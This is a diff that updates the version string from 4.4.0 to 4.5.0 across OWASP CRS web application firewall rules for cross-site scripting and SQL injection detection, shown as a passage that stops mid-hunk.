@@ -33,7 +33,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -53,7 +53,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -73,7 +73,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -93,7 +93,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -113,7 +113,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -133,7 +133,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -153,7 +153,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -173,7 +173,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -193,7 +193,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -213,7 +213,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -233,7 +233,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -253,7 +253,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -273,7 +273,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -293,7 +293,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -313,7 +313,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -333,7 +333,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -353,7 +353,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -373,7 +373,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -393,7 +393,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -413,7 +413,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 chain"
 SecRule MATCHED_VARS "@rx (?:\xbc\s*/\s*[^\xbe>]*[\xbe>])|(?:<\s*/\s*[^\xbe]*\xbe)" \
@@ -435,7 +435,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -454,7 +454,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242/63',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -473,7 +473,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|REQU
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242/63',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -492,7 +492,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -511,12 +511,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
 SecRule REQUEST_FILENAME|REQUEST_HEADERS:Referer "@detectXSS" \
 "id:941101,\
 phase:1,\
@@ -533,7 +533,7 @@ SecRule REQUEST_FILENAME|REQUEST_HEADERS:Referer "@detectXSS" \
 tag:'paranoia-level/2',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -553,7 +553,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'paranoia-level/2',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -573,7 +573,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'paranoia-level/2',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -593,7 +593,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/2',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -614,7 +614,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242/63',\
 tag:'PCI/6.5.1',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -635,7 +635,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
 tag:'PCI/6.5.1',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -656,7 +656,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
 tag:'PCI/6.5.1',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -675,12 +675,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/2',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242/63',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
 SecMarker "END-REQUEST-941-APPLICATION-ATTACK-XSS"
diff --git a/rules/@owasp_crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf b/rules/@owasp_crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
index 7b1cc5c..5ae39f7 100644
--- a/rules/@owasp_crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+++ b/rules/@owasp_crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.4.0
+# OWASP CRS ver.4.5.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
@@ -7,8 +7,8 @@
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@detectSQLi" \
 "id:942100,\
 phase:2,\
@@ -25,7 +25,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
@@ -46,7 +46,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -66,7 +66,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -85,7 +85,7 @@ SecRule REQUEST_BASENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -105,7 +105,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -125,7 +125,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -145,7 +145,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -165,7 +165,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -185,7 +185,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -205,7 +205,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -225,7 +225,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -245,7 +245,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -265,7 +265,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -285,7 +285,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -305,7 +305,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
